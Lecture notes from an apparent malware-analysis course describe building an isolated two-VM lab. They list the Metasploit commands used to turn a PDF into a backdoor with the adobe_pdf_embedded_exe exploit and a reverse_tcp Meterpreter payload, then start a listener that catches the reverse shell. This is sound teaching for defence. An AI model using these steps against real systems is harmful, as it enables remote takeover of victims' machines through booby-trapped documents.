A good defense frequently demands an understanding of the offense. In this lecture, we begin building our malware analysis lab by constructing two VMs and virtually connecting them together using the VirtualBox Internal Network feature.
One of these is a VM that is based upon the Kali Linux distribution, maintained by the Offensive Security training & consulting firm. We will use the popular penetration tool Metasploit to create an attack that embeds a backdoor into a PDF document that is intended to be delivered to a target. In our example, some research has already been performed to identify the host operating system and application versions of the target.
The other VM is a simulation of the target’s environment: a version of Windows as well as other productivity applications they are known to use.
In the demo, we build the attack, and in doing so we explore some of the features that Metasploit has to offer as an encyclopedia of exploits. We also demostrate building a simulated attack surface in which to execute the malware.
Slides: lecture-w02-1.pdf (PDF)
Commands I used:
# Do a search for exploits containing text "adobe_pdf" msf > search type:exploit platform:windows adobe_pdf # Select a specific exploit we want to build an attack from msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe # Show the module information for the selected exploit msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > info # Select a payload to deliver with the exploit msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp # Show the exploit's + payload's options msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options # Set *this* system as the command-and-control (c2) controller msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.3.12 # Generate the exploit msf > exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
Commands I used to start up the listener:
# Select the exploit handler msf > use exploit/multi/handler # Select a specific type of listener we want to connect to us msf > exploit(handler) > set payload windows/shell/reverse_tcp # Show the options available to configure in the module msf > exploit(handler) > show options # Make sure that we set the listener to the same IP we configured earlier in the payload msf > exploit(handler) > set LHOST 192.168.3.12 # Using the same language to build the PDF, we say "exploit" to start listening msf > exploit(handler) > exploit